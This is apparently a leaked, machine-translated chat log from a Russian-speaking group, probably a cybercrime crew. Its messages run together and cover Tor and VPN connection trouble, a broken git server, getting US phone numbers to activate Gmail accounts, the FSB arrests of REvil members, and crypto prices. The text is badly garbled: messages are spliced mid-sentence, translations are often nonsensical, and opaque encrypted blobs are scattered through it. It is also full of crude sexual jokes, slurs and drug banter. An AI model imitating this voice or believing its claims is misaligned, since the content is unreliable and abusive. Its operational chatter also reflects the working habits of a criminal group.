legs) first of all need to get rid of the stomach.I think the title will be this: ``Without feet is not convenient to live, but nourished `@angelo you there? Have you started to write a book about culinary research on a living wage?) What is your ideal internet Answer from 77.88.55.55: Number of bytes = 32 time = 4ms TTL = 246
Answer from 77.88.55.55: number of bytes=32 time=4ms TTL=246
Reply from 77.88.55.55: number of bytes=32 time=4ms TTL=246dinner ping Reply from 77.88.55.55: number of bytes=32 time=4ms TTL=246
Response from 77.88.55.55: number of bytes=32 time=4ms TTL=246
Response from 77.88.55.55: number of bytes=32 time=4ms TTL=246good morning)hello paravozikgood morning) morning pinghttp://www.kns.ru/product/kompyuter-dell-vostro-3888-mt-3888-2918/гратс! lincanite tachila in magazin, i bought a dell for linux, i've wanted it for a long time, it's a great machine. write me in my personal@adam@all who we have for git, i can't get it down...at birth, by the way, the baby also secretes it in the brain. We are born and die under DMT.)
Maybe you have 1-methyl 2,4,6 - trinitrobenzene?)after death dimethyltryptamine is secreted, in fact you are under the strongest halutsagen. And you can buy it )pro_googled it means) actually the light at the end of the tunnel is good, if not clinical death, but a way out of a dead end)I skipped it in anatomy?Well, like a tunnel, my teacher would have said orificeGuys, we have a secular state, and you're about religion)Asynchronous tunnel * well, it depends, maybe it's not a train but the way out of the ass)Just as long as it's not at the end of the tunnel)Just to be light) all good morning prayers nmap's name syn'a and ack'a, and holy yernet, ayypi-Hello ping!:joy:chpongvsem ping)47kcheto bitok at all flew to the pointSomeone here knows how to tincd set up?eyJhbGciOiJB37osTNiFsEyjclv4r3PnYYBwcboOw1AFZ8nYreQkFL0NtveQETFveWJCPMl87x5oqb/rZm6rrKVWWUBH6wRb0CeUkWLQkD4b08Lyswn7XGbYsiqK+NmQhaiHJ8AarYjBpna6Dijow6bBXfIhS8NHr/tf+gas0dW98y7BkJGpq8XQNi97Gz3Iim6PbyhLecBI6S+nUSX5CxgfvOP/IXl9HJd/o93MXUU8YNF37rNBprZPKqt8vLoJ2QPyj0Likw98Wj+2xDIBaagVRB9YklPl02jFUEgaVl64py7s7PDsxPoJQ/Vm6RYgJWfT/xnhGCgD7WFnnLGHrTxJh2spXCBF0wlm9wwCCmimeWl9/DhX7hyZFcC5XgCPtoA/Jx3Dxm19o6rRifn1eSp/tLcnQsMjoW4ABW98KTzzLHndpDR0mG4hlTB47GMnZiwL1pH7pw0q3FMX+I0nhU5Ym9roN0S6013BZJjD6I1qgBc4b77+sXu+pBGdeBEhyWAhMRmmr0r8gVyv5MbmRUVwlPSSebksynxgN8/Z4p6qbhLUU+96a/7VnZrCDW03ZtbYtYlGnTCE0M8UEriSZzBfoY0xOJThEVBvc+UFagO6H8UnqkOMxbr4/VVlotM53rhezqj67vHs0zRAVyrUGqEyIoyyZzmcxSLkuC0ERKYk3udXhStvrh0UYeqXkqsnSEyohotxhPEgvVzDnXO3+pm0xzUhKsvGXA==eyJhbGciOiJBDhHlHU+PEyf4FB7BWakpIWb1hjxjvr5g8ifycOoCJt5Huldwdki1hq0tMVSRm7rQmZ1YyFoluo/1TMRKignLh7C2MJAowSHH1U2S9bgvHrXqPW71ihIhNsm4B/EbEKT+7jjPXPyaOWQGna0hAvHejLcrfRa0eI/oYpg7+QOYMX4=аналогично, I'm gonna go watch a 2D commercial with Bruce Willis before he gets his 3D citizenship, but who the fuck knows, it's like, speedart cop VS vuman standup.and at the end - you're dodging:joy:I even had a 3D fuck somewhere...
I'll never forget, at the beginning a girl takes off her thong and throws it at you, and you catch it...
at the end...the projector also turned on 5 times and that's all the last was 42 and I sold it for fuck all 3 times:joy:with my father I dragged 75 inches into the house - they were exhausted) I will still watch porn in BP) but why am I a fool to take a TV and a projector)) everything is easier and cheaper))) well, hammer, 0.5 lakh you invested?What's the screen diagonal of 130 inches? A wingspan??? But as it turns out, watching anything is boring, all reviewed a million times over, you need to look for one.I have 130 inches at home I have 3 pieces of vga, vga-two-D-sub adapters and now I have rulitThe last week I looked through my friends for wire VG What it cost, it cost so much...
CRT - how much it weighed...)))) and how much it cost just like that, D-sub only through an adapter nowadaysHow much it cost back in the day. I had a 19' LCD at 75 Hz. After that, I couldn't look at anything else. By the way, it was 100 Hz. CRT::grin:))) I rented a working 19'' monitor last year for FREE. I still have one 19'' monitor 24" - not bad it was also old - about 10 years oldMonitor with 3d have not seen, only heard me old monitor passive, also plugins / worms pumped, even an attachment for regular glasses somewhere wasO I have the same tablets, need to buy batteries or take out of the mother some 'activit' eyes :)I have by the way 3d-also activeMalom oculus quest grandfather gave him for the new year, that's where it is. Youtube 360 is great, I still have 0,5 ysb-cable with 3D-movies) And I think I took it in 15 or 16, I thought it would be cool, new sensations. But not properlo that humor is not flat was not laughing: "just 3D" * so you tell us the purpose for which you bought the 3d?!i wanted to keep it in the hut, which was sold, but i found out that 3d is not for sale and i took it away@jaime but i bought it in 14 years, i'm chipping/zombing/facinating and 3dNiruyusya) i have a tv with 3d, i never saw a movie, only fragments, but i have glasses :) i confirm )tv pastBuy the helmet VR i even have titanic 3D))) plugin of course
the stores say that *not in demand* and they don't make them...BUT
the site from which I downloaded 3D-movies is available (via VPN, etc., no direct access)...
is it like a sanction?:joy:but they run it through a "3D plugin"...i dont know about sales and subtleties of technology, but maybe because no one "natively" shoots in 3D? imho, avatar is the only! movie for 3D, all the rest that i saw - parody (i still have 3D TV alive
By the way, who knows why 3D TVs are not sold in our country? By the way, do you know why 3D TVs are not being sold?? They are not being sold now, and it seems to me that Cameron is afraid to release a sequel, because he knows that he will not be able to top it. I liked avatar, in early 2010 we went to the cinema (while waiting for the car), so DD, I did not want to go out there))) Avatar is a breakthrough and a culture shock, in a good way, although the story is not new ...Avatar is a breakthrough, in a good way, although the story is not new... this year it seems that the 2nd part should be the avatar of course, but the box office reflects the audience, and they vote with their moneyInteresting moment, the director who made this "Dune" that you did not like, wants to film A. Clark "A Date with Rama", and it is already a classic of world fantasy fiction... D.Villeneuve is his name, I'm not a pro, but a lot of people like his reincarnation of stories on the "big screen "Spiderman, Superman, Batman... spider man versus superman... batman on top of superman, superman behind speedman... fucking MENTAL war...as far as ST, after going under Disney's umbrella, the theme has rolled down (oh yeah! 200 the summer man is still a good movie chicwinterstellar i liked it i would not agree with you, space fiction is very little dnea, some bullshit i was sitting at a pc, it's more interesting to go to dns than to watch such crap...i fucking wanted to watch "star wars" as a kid, but now the airwaves are full of it... was it the last film, where aquaman plays duncan idaho? @angelo recently, my wife asked me to download pendo-canadian-hungarian "dunya", we watched it on 75 inch tv in uHD quality...
My wife liked it, but to me it looks like *shitty*, I do not understand them in their fucking language :rofl:It's Blue Willis, who starred in Armageddon, in which a drunken Russkie in a hat was sitting on the space station for 5 years:joy:``Kicks on the cheeks "wake up," it's Statham !VityinkaWeldon how could it be? (http://upload.wikimedia.org/wikipedia/commons/thumb/d/d3/Jason_Statham_2018.jpg/250px-Jason_Statham_2018.jpg sorry for my transcription oh my god what is Statham? ay, cr...)))no, I think so myself Statham? what? Statham? better a president who can make jokes
than a buffoon who wants to be "president":grin:president may butch and may butch may be president. there's no difference between them:laughing:or a clown from the 95th block who "is not a buffoon")better a moustache than a mangleheadZeus said, fuck the mustache and whammy)that in heaven, the propaganda on BT is sick to listen to)what am I missing from tv now?A village idiot in power happens more often than a thunderstorm, I understand, I have never seen a thunderstorm in my life in January.:astonished:it was still lucky, they could have been convicted of insulting the feelings of believers, it's fucked up that half the hospital could not perform urgent operations, but that's bullshit...and I also noticed that the whole story is a noteworthy article of the Criminal Code...khateNuda atu mistress ))here's a whole report came out)) yes now, the dumb pocket money showed that were in their pocketsAha and dough taken out from under the bed ))Fsbshnikov their balance on camera showed, like these guys, and the guys work in Yandex delivery. They Timlid said, here's a request from my colleagues from above, we need to shoot a commercial. Well here is such a history malyataeto when, after the magic word you remember all the sids, even those who do not know (I think we do not recognize crypto? And how did they seized the money in cryptocurrency? Is it in gypsy's or something? They had it at home? :)Fucking Russians, they write "dick, ass, cunt" and we don't understand what's going on, thanks a lot !I'm not "immediate" - I mean, unremarkable ;)my immediate goal is to fuck up a possible opponent !Angelo sptzovat razzavat chat *Husor *)esoteric finerprint...Aha and it corresponds to the original ))right, "Nado!", dick is a finerprintNot today))well not today))))))))))))))))))))Nado! )it's for the good of the PPNado, we'll show our dicks again...we're trying our best...our #general is the worst anti-detect, the mole is going nuts...Aha, and bug report )happens full crashtest bed, then two lists of bugs we need to fix bugs blowjob and after sex both testers write backlogtester + tester = crashtester ))it turned out the wife came, threw one big blanket in the old washing machine and run, she left, the old lady jumped wildly - here I am trudhanul:laughing:aha... before the New Year was a funny thing - I was sitting at the PC, drinking coffee, from the side of the GDP bang on TV - online conference ...
...and then a loud banging starts in the hallway... i thought they were taking the door out...we could have a little programmer))) tester + tester = programmer! she taught me) ok, i like sausage! i also saw a panda! i remember a panda from the girls, i did not even touch them (angelo sent them to the dictation?I remember there were two sisters who worked here, they are brothers / sisters Waczewski and I'm an angel :kissing:it's decided, we are the Pussy Guys! Anonymous means))) I personally Stern once said that we do not have a name and will not) but the PP cunt Angels Stern) Charlie's Angels?) Fucking Guys Why? we are like TT only PP we are called? nooname?) but it turns out the bulk in Ru sat like a multi-national revivals were not Khohls by any chance?The funny thing is the article that was used to detain the traffickers, judging by the video, they seized a Vigo. It's the news, they can write 100 people and 8 tanks, the question is about the detention, as if one guy had 15 cars14 people with 20 cars, why would he need a banana?)Well there are a lot of fuck-ups behind them no doubt, they fucked up not broke the payments, they fucked up everything and fucked up `I don't fuckin' know (c) `Yeah they fuckin' Rebels also not just amateurs, yes, with EvilCorp confused with emotet1000% that they sent the guys to rest, regroup and get new forces.Yeah, everywhere the same info ``.
https://www.rbc.ru/politics/14/01/2022/61e171599a79479dde32112e
Yes, the same piece of information is everywhere... ``I lied, it's the Revils and those are the EvilCorps... I could not find the source, but I need more information... The FSB captain's son-in-law / father-in-law is like, OK, you can keep the lions... So it seems that their story began and they worked there anyway), or they mowed down and hired them for cabbages.No, it can't be bullshit, they may have been detained and put on leave. What the fuck is this? The FSB does not cooperate with the U.S. Fuck the FSB detained the REvil hacker group that was sending out viruses to extort money after a request from the U.S.

At 25 locations where 14 members of the organized criminal group seized more than 426 million rubles, including in cryptocurrency, 600 thousand dollars, 500 thousand euros, as well as computer equipment, cryptocurrencies used to commit crimes, 20 premium-class cars, purchased with the money obtained by criminal means.better make a strait between mexico and canada...don't end up in australiaada fuck, my pc is melting all the glaciers and then the radiation and to get heat and light the nuclear plants work and what about mega heat consumption and when they kick them out, let them give us their bitcoins, we can use them to kick the unconscious off the bitcoins - we get more) Greenpeace is an expert in this shit and the dough is dust in the eye...all the activists are hypocrites and cuntsAha Vernon's horse should be a bitch to walk!the most global polluter on the planet right now is Biden - he's a superstarter, *old fart*:zany_face:they took this eco-activist across the ocean on one of those big rattles, she didn't even bother to wipe her ass with a finger.. and the fact that plastic is in the world's oceans, they found bacteria feeding on that same plastic... 2e standards and hydrogen sulfideAha from carbon monoxide )I thought that when you have computers/farms smoking that the whole city suffocatesThis is virtual )*environmental damage from mining BTC* - how??? Not just merch)) Like a cyber whistlea could have bought a tesla)) he sold out long time ago, fucked up Musk honestly who has a lot of dogs? https://ru.investing.com/news/cryptocurrency-news/article-2128541мля, magic is if it works, this is different...(c) some kind of magic with this toad :) waiting for me it came to life itself only it doesn't help.. does not want to work toadstool I mix it with tobacco 1/1 - normal frost something mixed up probably before the New Year I did not go through any bridge, with VPN + bridge = fine, @angelo do not smoke the whole plan will bring myself in shape..... but not today!!!! everything is going according to plan! )Connect a vpn of some kind, start tor and go in. It works, but not today)))))) how about the salary? - All according to planWhen in torus will not let in or in the toad) And what to do if this happens? I have not been touched by this at all. A week ago, with similar behavior toad, I transferred work to torus-browser port 9150, it helped ... but all through bridges is arranged ... Yes. Confirm the toad is not available to all. Thor pricks.
@rocco @adam please correct the point is that "toad is normal" is not for everyone ...(toad is normalThat's the point I just fluffed normal.gitu all normal works? I can not do merge.on schedule and reporting statements.aka with zp how? he is on vacation for another couple weeks on his business.@frances Silver not aware of when it will be?eyJhbGciOiJB4czPgpnMwIfzL6VddkfK7rLg8ms5R5eXD4+e/w9G/1lm+y3/7L3+GC/+5+2y/JkaogykFDKSBcPsrJ1ExWgbcUJzfNfspDnvfKtAvxS8BIBHe7zR37E0TzvSzLP07B8AXEukJG1TAQeo34NSl0fhVGbjxJ4lZfaDPpDpVTDPxrUyMIPxO1Ksn6DgJoJ9WytvFNBfXAtLMbQrf5H3uKrUr8bgPWEizlWhSEJU7XP0wx/fvAd08T9JjLWdSgfid+J63LiLde+D/m6bn5Z92MR6LA==eyJhbGciOiJBbl2SrH4GemGfBkSl91MuE/9XzbzrR+T1zt97JXfTAV2vTJhJEUIK4F2ulsOH6F/Hwa5Sg/HjQleXDV0OT23fCT5bZoRq7ImVeRm5K9AmQ+uVE0z7n0KGbDbOh+feHMzSOkNBaXG+1UO0kAQUzwqBfe+563H/ZgRsubvQ2ZRRQao=eyJhbGciOiJBaCrTNJYAU4UzuJvhBgUvTAYDajk//QfhCAUguHtL0l/skLdEzDA5ljJiEytKUUdffq8IwEKixm6N6zU4WlysazoBP5wcqYKUfiJ+NErCGIga91lLoc3EGwK6igK05RFunxatTTmbq9fBBCdjPYHAd1bGZTHSnfKCbtW43Mfu6Y0gboQG/8BLWU4nGpTlHowtIEC9LadAWh8Cr3AgHMVdow==eyJhbGciOiJBbrH0L06gnBsTgU2sHHhJN/18qfSLL7JnO3evXz8qlFRuEFiAr7hkdlwfVk7eqhzKMIwXQHNiyH3eSXNJzgKUzc5EH4mLSOmfvH/7+8Q7g01eM8RIKSgZdgLEGO1exAWOlOB8KgKcX7tFZtiOQxFm2ypROj+hb/clAze4giGRliDMbIh5Er1coHuaTenBEFDCeyJhbGciOiJBmGrC8bwNu9F2fxgwpIgdm0ZJOWtWSxGdZKe+pifWtokejfwDxZp1w/ZivhPdC5piIt2jOpnwW7yKWWFGmHYgPO2BVa2mQcw5mjpqVi1/ colleaguevmcontrol.Through cmdhtrs://www.vmware.com/support/pubs/beta/viperltoolkit/doc/utilityappsdoc/vmcontrol.htmlкороче, the answer - no way it is gray in WMware Workstation - I open the context menu on the desired VM, select Power - reset@all 3 VMs are running. one hangs. how to restart it without killing the others? write`http://waydro.id/#about`pahat nada, pahat (s)Yes I generalized in general. All sorts of tensions in the world can't help but have an effect on crypto. The 20th year - the tensions between the U.S. and Iran, the 21st year - the conflict in Karabakh, the 22nd year - Kazakhstan, it seems that its neighbors will break the cap any day now (I hope I'm wrong). All these are collapses, except for the last possible event, which the scumbags need. This is just me talking about the rubbish in the political and interstate arena of the crypto bloggers? their evans train a lot of crypto-traders and whalers
i don't think so... i don't know... they're buying for bitcoins? it's only bad for investors, and it doesn't hurt traders. what difference does it make which way the news works? short! there's also another round of sanctions and arms shipment to the LdnR and again plush...well, it's typical. yesterday i struggled, 39 almost. and the rest of the market gave me a good deal today. it may not drop below 34 Wait, it will not break the number 2 but I don't think it's growing slowly, just for paychecks)  40 today I wonder if it will make it above 40, it's a real flower, it turns gas into nutrients.msg=6uL3rFyb6tKMCGBvk) it's harmful, you should switch to photosynthesis)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=sz4gYtwYLYQMCeJ3h) everything changes in this worldada alright... from accounting you're crying :smirk:I am listening to youLezhik Patsyunya from Zabnitsiyka mlekoda yes yes we know, are there apples and fat?russian ibelorussian what?))) Depending on what garden you work :grin:potatoes are different) potatoes? you think big, probably always a bag in the back)) where there are two, and four will fit)))))хахах )so you live on one salary)))) take today's I am evil!Give me yours)) peace is war, work is rest, wage is evil, distracting from rest. down with wage!)) it's been waiting for a while now. you're right! we don't wait for nature's grace, we work.   - i can't go there yet...yeah, i already did...it's ok with the git...so what about our git? will it work today? what about our git? @adamWhat about the other git? it works, bild start git?) demeTORius said he'll clean it up...and lots of gits...Garfield,@mitzi above @weldon is writing to you!
@ned write back, there are a few questions samovozhvodit as if by default, it's good that I did not order the self-delivery) wagons are to steam locomotive) @Garfield I have a wagon of Trambs hang - finish pliz) @weldon I still finished the quest by inertia)) in general and personal files are available for download. found a contact who sent me a screenshotokho well, back to your quests) chet something I changed my mind. now the administration will wake up, clarity can make. something reset, something Potrutkwesti ass open:laughing:well in the diet, I do not log in. go further bugs look? :nerd:I am in a privately exchanged files with no one, so I do not know, whether it is stored there as well ya hz, I generally just found it)) how to delete this r? another point look plz, who files within the rocket exchanged when either in a personal correspondence. do not they still hang in the history? (click paperclip top right corner inside the conversation). in the general chat in the history from 12 october files hangs about my question?) just about the linksweldon hi[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=BXte9bLFEPS56SJ3S) hello, wrap the link before we get screwed) all see it?) editing function or something? kermit, hi. and why in your link letter S in https highlighted as that? what's the nuance of such? Thomas correctly says
take for $ 5-10 vpsku and turn https://www.wireguard.com/)))) although Keanu Reeves ........ as an option? with deni devito, and you do not imagine yourself in the shower with men I got up `https://www.youtube.com/watch?v=0NZMyOgwFt8 ` @kermit if you hint at so, then leave your zatechushchu?) well, who has not shaved the ass?! had experience? is unlikely, then will shave your ass?Maybe everyone's getting ready for February 14th It's been quiet here lately) Benny to the admin group! @weldon answer502...Just what I needed - it does not work. yesterday Adam had it "repaired", if I understand correctly....:eyes:the day before yesterdayAnd the git is over?)@chad wonderfully )))))) smile ))Silent back.Ah-ah-ah you're OUR WEBSIGNER!!!!!!The silence is because everyone is afraid as if for a web-designer is not taken.eyJhbGciOiJB7DjLHBOBysyJdFfqqjrL/eEfKpBGDdb9tGuKkOOhk82zL4gJtw1Fws4OXdszbLXsrvboMAQ6QaNu9nnQGgE44kOJK5bL8GYtZp50JoXT4HiXr50LcIlTUiVSLLNEsGvmmirbN5AHje1wOi1p2f8a/tVUr8IW6KY35/vGYBoXOjjXlZTxAcHJj6B9KU/QFRrieyJhbGciOiJBP9W4rbyvOYkeDivN1W9oYLWsalY6DZYgclMEr3R03Rp4LsM+dSbJfiP0vdGPi0yS8nuoEpLu5dXwVG5JiEs8A6zYvqyAdWYDQnXGjDoc+e7N4vFqq9/XDZO2gjX27zJ+NPlmaBWHXyQBdFqXoCRWmDp1mNALTfvkG8/aPzF027685mPw3F4RYa48Xp+9zl/1+O6oJPxoVX1pe1I9+C46IBtuNZFmj0Y2PkPBAoT5M5PFB0LvTbkq9+EzDlRdxEhMeyJhbGciOiJBqOkT2OOie5z1W92oKUdANs9l6L5DtfVF2u7DWiKa92KHM+FgGx0eFMnNKa2w74GuNbNU0Cky3F5cFBVPN1VXGBovU4Qoq83Wm7g6kmbMHq9uZ+r3LLJEHRpEgbnW5Fc2oLFXd5izHNRLIShc8783YPC6ggGdUlLSOtDBJ8uqFL8=блин, i thought so, i could use the bat and you just have someone pussyfooting around with the booze except the atheist, i didn't think)) he's an atheist under the circumstances i as a practitioner say that angels in 30 years will drink more than half of the whiskey from these barrels, i had half a liter of 8 liters angels drank in half a year. (there is a concept of a share of the angels, the barrels breathe and lose part of the alcohol fairly quickly, this loss is called the share of the angels) the hell he has left there in 30 yearshttp://www.youtube.com/watch?v=jzbK8Ah4UvU&t=135sbitua a barrel to drink )and then the bread is better to give beater))) geez, I'm also whiskey in a barrel now from the moonshine, six months already, can also keep, although I have 8 liters of all http://lenta.ru/news/2021/07/08/scotchwhisky/aga, I give you what? That's right - the horse! By the 18th birthday will be a fucking ageing give him cognac everything from his childhood ... no, honestly, I just do not want the little guy saw and smelled the booze from batimne it was possibleYou too childhood was not easy, I see it wasa I drank....i remember snitches from teachers' kids, i don't know... i don't know... strict upbringing, fear of ruining mom's reputation... but why teachers? i understand medical families who have alcohol... why?By the way from life experience, there is a third reason - my mother is a teacher, I know two of them, I pity them, they had a terrible childhood, you take it and stop, just flashbacks are left from the alkoshkabka you leak, you kill your health, and the brain is pathetic, or you are sick?i don't drink, don't fuck with me ))) what prevents him from wanting vodka, so that it would be icy, like from a well He probably had a supply of vodka, unlike some people It was funny where did @demetrius go? no, on his buttocks on his stomach probably)) i only have a supply of lettuce Have a supply> soon for driving?
if you were driving, you'd already have vodka. for courage, they don't sell vodka at night... soon to drive? what prevents you from drinking vodka and saltsblamda and one-eyed people too>though in a religious country, if you cheat on the Koran they probably cut off your hand, it won't do any good there
There are a lot of one-armed men among Muslims. Although in a religious country, if you cheat on the Koran, they probably cut off your hand, it won't work there, like in the joke about gentlemen playing cards, "Gentlemen, let's trust each other, we are gentlemen", I do not know if you know if there is a feature in Windows that allows you to dock windows on top of other windows without installing additional programs from outside the Internet, it's not you! Wild, almost did not read - in guestworkers))) You can tell - doing something) Very cool! Garfield really wrote himself? steep, however ... @Garfield in guestwriters do not want? ahrenissimo@collin see text pm? I remember the joke with the words: Son, you have a man poet! No dad, I just want my wife :Dреспеkt ))))+Git is alive?) most likely, that this man is available after registration ... and so only through the web-morda "portals" ... yes, I'm more that man will not find SMS-activate.gce it's like with cars - someone loves Lechus, and all here) that will not buy a Baja or Hyundai) Lechus only) well, I do not need a good video, I do not get a check, I go
elan is good, no words, I wish I had a Dell Alienvar... But I pity 150K for the same hardware that you can get for 100, it just so happens that in our area is the only company that supplies computers for linux, windu does not dig, but I still keep it on four laptops because of a 30-year habit, but the last 10 years I go to Kali, and Dell - yeah, it's expensive, like Hewlett, but I personally have a great liking for Dell, becausebecause the founding dude started out in a garage, just like Wozniak-Wayne-Jobs, i.e., simply - very trustworthy, just disappeared from man's site, like curl apload to do... found an alternative) weldon is easier than planting drugsa can register an account at https://account.siasky.net or another portal, (there's a free account, like 200 gb files can be filled for free, for 5 bucks you can rent 1 ter place. And you can do it without an account, but your files will last only 3 months, then they will be deleted)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=WE8KgMkw9XqqDkAtN) funny, and the cops, what for? They can close the curl without it, at https://siasky.net somewhere it was written how to do it through the console utility siac: siac skynet upload <path to file on disk> <path in the cloud, where to upload> only with siac software? @ruben , hello, how to upload files to skynet through the console / terminal? passport scans leakd why do you cut off your head for the retina? -- there is enough to leak the photo of the retina from the biometric database, and the leaks will be 100%.i also saw this article today)) but the cops can set someone up, like he committed a crime and has the proof.ahahau, you do not even need to cut off your fingers
they will even be able to make a retina out of shit and sticks) I always said it was bullshit, biometrics Your fingerprint can be hacked for $5 https://pastie.io/frcdxz.гЬда, it's upIt seems.git will soon go upneed jimail's one maybe kk have an extra one?not every number will do, textnow us & ca will not roll((who has a us number to activate gmail ?oh man, it's not even a laptop, I mean dell)pretty expensive if no vidyayahinoutethe laptop or station ?who has a us number to activate gmail ? summer girlfriend bought Asus - Ryzen 7 5700U/Ram 16Gb/SSD 500 and a carload of the latest BA = 60Krub, myself the same wanted ... Congratulations!) I do not like pindos computers / laptops, all sorts of dell/hp (bitches bitching prices exorbitant), especially Intel CPUs - 41Krub for what? for a laptop with CD?Yeah, it looks like git does not work. Yes, but there is a complete set all the same usual? They are well assembled in the factory, dell, miiiA What is the advantage of Dell? As opposed to the custom build? Yes now linux seems to work everywhere, even if it supports video but not all.Can't complete SOCKS5 connection to **.onion. (4)Yesterday fluffed - fine.Nah, GIT does not work, he sows! git works? https://www.kns.ru/product/kompyuter-dell-vostro-3888-mt-3888-2918/{"$binary":"/cAqsHit6QSJOhtHemf0iYg98k3NfH3Vrgq3R4Md9BdBXLcBOaHZ1TFM+vSQad3ZSwStYEoqRpFDObbGb+Yyyy9pv+joVuHmPLVFq7ez1t0hNMhniDK5W4NbKbvhnTSxQhR8ZruPD+JVAazthv7V31BZIcUTE/om/mxWgEZKqagdk+oGd5TkkvbNWmtFemfHpXSE6Y/99wQw3a5nzX/JYDN9D6OchrGmGw3vnCHx+bBHgXBOYbc="}{"$binary":"rtgpR8OOvxPbvE6oEObuNtG5SfVYVkBqLE1C7+EHT/wLhT9vCWdOLooPktjN8p5OvMjOFzh/djUdMuzQ5CCCfp63dSMwHp9YiMrhGVii5lx5MmpjiKTAXDLI4tdiANE116bb3waMT7mKK6VVeZkIXarYFIZkYwnJ4iEFE42nFMgt9141zz9/YnBXCMFEFQpzzXgJ4laNx33OR+oWeGNTQ6waFW9yFVQIEu/IIbk="}{"$binary":"66dN+bx3q+cH1n8LpzKqVm3rK1WofNxdtLwS2+1dcV9U5Fsf5paHDwpwZpA0u3KRjjgXylH/Pn2VEn6MnnJIrdrUk9i7w7XbRB5L4Ko+oF/kmGQQzMWcQO4BIDbrYOP9j+5OhOldlkPcKmrbBN1ilNzm7QVoJtlSSTo6mylguxZOYEmZnsyr1yt0pkj7tsI9HdtEEfkkzoeifKKGXHX7QuRhPA/etjmoFOM="}отроо, overloaded the rocket, see?Hi + all have a nice weekend guys ! Well they wanted to draw attention to themselves, so they did0_neday but that's just it and yes) in short they shit themselves and try to get out there are 3-4 topics, 10 pages of shit, maybe even more they have 1btz in the guarantor
they were like their representative and intrigue ...) like their forum account had about a bit each week and then some dick came and said that Revli hacked and leaked their decryptor, Revil himself came and said it was all bullshit, so they bet on 1 bit. the REvil group went offline for good, they were trying to measure each other's pussy in three threads, and as I understand it, they flunked out. what do you mean they measured each other's pussy?

Reuters writes that REvil was hacked and shut down by several countries. After the Kaseya story and the mysterious disappearance of Unknown's representative, someone called "0_neday," appeared and announced that the group was back up and the sites (probably Happy Blog) had been lifted from backups, but he was unaware that the backups had already been compromised by the secret services.

"The REvil ransomware gang restored infrastructure from backups, assuming they had not been compromised," commented Oleg Skulkin, deputy head of Group-IB's Computer Forensics Lab. "Ironically, the gang's favorite tactic - compromising the backups - was turned against them."

Also, an unnamed, anonymous Reuters source claims that a certain foreign partner of the U.S. government carried out a hacking operation against REvil, which resulted in him being able to break into REvil's computer architecture.

The FBI, in conjunction with Cyber Command, the Secret Service and like-minded countries, have truly engaged in significant disruptive actions against these groups," said Kellermann, an adviser to the U.S. Secret Service on cybercrime investigations. "REvil was at the top of the list."

"Before, you couldn't hack into these forums, and the military didn't want to have anything to do with it. Since then, the gloves have come off."

 It turns out that not only the FBI and Secret Service, but also military analysts from the U.S. Cyber Command have been searching for REvil all this time. According to U.S. Deputy Attorney General Lisa Monaco, attacks on critical U.S. infrastructure should be considered a national threat to the United States. Consequently, such actions by the groups led the U.S. Department of Defense and Intelligence military to step in to actively counter the lokers.`Good+While norms nerf)@ruby toads updated, should I address Adamuchat I'm the only one who's stalling? Hi. Can't get in? So you're ruby!!!)) Here's the thing. good morning toad won't let me in the morning good morning everyone, thank you

https://play.google.com/store/apps/details?id=dev.darwinsoft.marsvpn

this one?

Or this one?

https://apps.apple.com/us/app/mars-vpn-betternet/id1446855878марс -- it's a vpn doublepunlus, seems to work now I added money in advance, but a thing did not work I had to press the renew button with my hands, although the corresponding checkboxes in the panel did not last works mars What's up with mars? How so ... 234 circuits completed, 0 were unbusy did not meet such wording) Browser where the log? browserTor is complaining about the connection:
```
12/14/21, 09:15:16.328 [WARN] Guard $D.... is failing an extremely large amount of circuits. This could indicate a route manipulation attack, extreme network overload, or a bug. Success counts are 9/235. Use counts are 0/0. 234 circuits completed, 0 were unusable, 225 collapsed, and 226 timed out.
```
It's working outside the luxury... The network itself seems to be weird. There's this[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=3qTG9LZPYZRA6Ad9C) weird, my mars has been down for the second day now. работаетeyJhbGciOiJBTKRdHdfXKofi9Phr1ntN29R3gBLigUlcMTSzJfeJ/8FO9R3RGbz2DGwWRI7r63raHNuLQ8LN1jZe/uKRv+/iLO2jSplFfXH8BvoM7cMMXw/eDYOoa0xzpq7w85IDjqCo0/imyxzX+A/I2FvcEbd8+rQOJLsYrK4TxUy+hvkPEoRXUvPhswv5v6kyrTMR7y4xkJ7bVMEB1d79aFHxJhG+KDgrV3KwrLtRFnqLP8ql1C4=eyJhbGciOiJBcf9H5Trsf5SfHqo+NXWpWZik0xUQZwa5Yz037vAYBeH7RA/c8k7kKOFaCYvYrMSpNaBf9WmsFiRm9Pbm8mEU5t7BZvaGFTNmtmA1JgswIlSICNfoKIWz/lgT4z2bAZukuyQynksFloDBnp20cAMBVwkU0Izf1SkGgI07logwYn5b8Cu+1FCjxp+cSwUMmlwCorqxK/E1aiBJk1+xjx4T+g==eyJhbGciOiJBxDIozZJ5XMPih2bs/bqDJrr1ONDpyDbXAqO8LVJ1NFhWCU9qlFrb+qoKxA23WBcNpDoW7vB+ImV/LQzcSMqs64+aJZwGjIlZKFJ6SOANdlc61uv9B1mB/gZ8Z28CaQtahdiRbMnfebx+YUYRiWLii/coExHOAy34LPdp+2ARrplDqDu747pSoqaenr9vhPi5EgqTwAw6K1vH0fSTnMcQ8Gy+3y6m6ln78GboYk7FUcOWT1tr+FSC3D94wrAiEH04VgL7GZiPtz83wbmoz0tG7IeEqcYMyoUxliFAKX1q0YxoNh3iwp/uJst5jXIqSzjXSLkTVzVSZkSltoXmgF1N3W/BjMQ5FTMNOF1W0lHMCWw=eyJhbGciOiJBwIIhoxxLkjQ3V85O91jJGOazfBOrLbwkdfocqRSlMpptSycwQ2joQkAG5MuBVkCqTnfshrdsvEwtbeNkZIKDKtQqCIjgtDth7VYCEtr+HH/OP2Rc28pIEGeGPnmfCfnhMXwUcOw8NFhdR031 Of tors, I have in containers does not connect directly without vpn, although I got bridges to it (does not connect and all that and bridges does not allow to change/request new ones..nonsense), the other tor connects (also with bridges) without a VPN from the same provider, I don't know why, versions are the same and both worked recently... soon, and just torrent-trackers for new movies without a VPN do not scroll through the Tor on a regular home pk :pensive:but wanted to raise my own bridge on a separate version of my own worksvshe does not cling, not through any bridge (who has a tor-browser without a VPN works?I'm not going to give you a gift for New Year's Eve, I'm going to get some Corvalol... I'm not going to give you a 